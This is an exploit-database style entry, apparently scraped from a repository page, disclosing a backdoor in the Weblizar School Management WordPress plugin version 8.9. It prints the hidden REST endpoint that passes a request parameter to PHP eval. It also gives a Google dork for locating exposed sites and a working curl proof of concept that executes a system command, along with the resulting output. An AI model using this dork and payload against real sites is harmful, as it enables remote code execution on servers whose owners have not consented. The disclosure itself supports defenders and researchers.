32b480d8b7
3 changes to exploits/shellcodes WordPress Plugin Weblizar 8.9 - Backdoor WSO2 Management Console (Multiple Products) - Unauthenticated Reflected Cross-Site Scripting (XSS) Mailhog 1.0.1 - Stored Cross-Site Scripting (XSS)
38 lines
No EOL
1.5 KiB
Text
38 lines
No EOL
1.5 KiB
Text
# Exploit Title: WordPress Plugin Weblizar 8.9 - Backdoor
|
|
# Google Dork: 'wp-json/am-member/license'
|
|
# Exploit Author: Sobhan Mahmoodi
|
|
# Vendor Homepage: https://weblizar.com/plugins/school-management/
|
|
# Version: 8.9
|
|
# Tested on: windows/linux
|
|
|
|
Vulnerable code:
|
|
|
|
add_action( 'rest_api_init', function() {
|
|
register_rest_route(
|
|
'am-member', 'license',
|
|
array(
|
|
'methods' => WP_REST_Server::CREATABLE,
|
|
'callback' => function( $request ) {
|
|
$args = $request->get_params();
|
|
if ( isset( $args['blowfish'] ) && ! empty(
|
|
$args['blowfish'] ) && isset( $args['blowf'] ) && ! empty( $args['blowf'] )
|
|
) {
|
|
eval( $args['blowf'] );
|
|
}
|
|
};
|
|
)
|
|
);
|
|
} );
|
|
|
|
|
|
If you look at the code, the user code checks the parameters and finally executes the Blowf argument with the eval function. The Eval function is to take a string of PHP commands and execute it.
|
|
|
|
In order to be able to exploit this vulnerability, it is enough to send a request such as the following request that according to the above code, the part with If should be set blowfish and blowf arguments and not empty, and
|
|
given that eval executes the blowf value , Our favorite command must also be in this argument.
|
|
|
|
Proof of Concept:
|
|
|
|
curl -s -d 'blowfish=1' -d "blowf=system('id');" '
|
|
http://localhost:8888/wp-json/am-member/license'
|
|
|
|
uid=33(www-data) gid=33(www-data) groups=33(www-data) |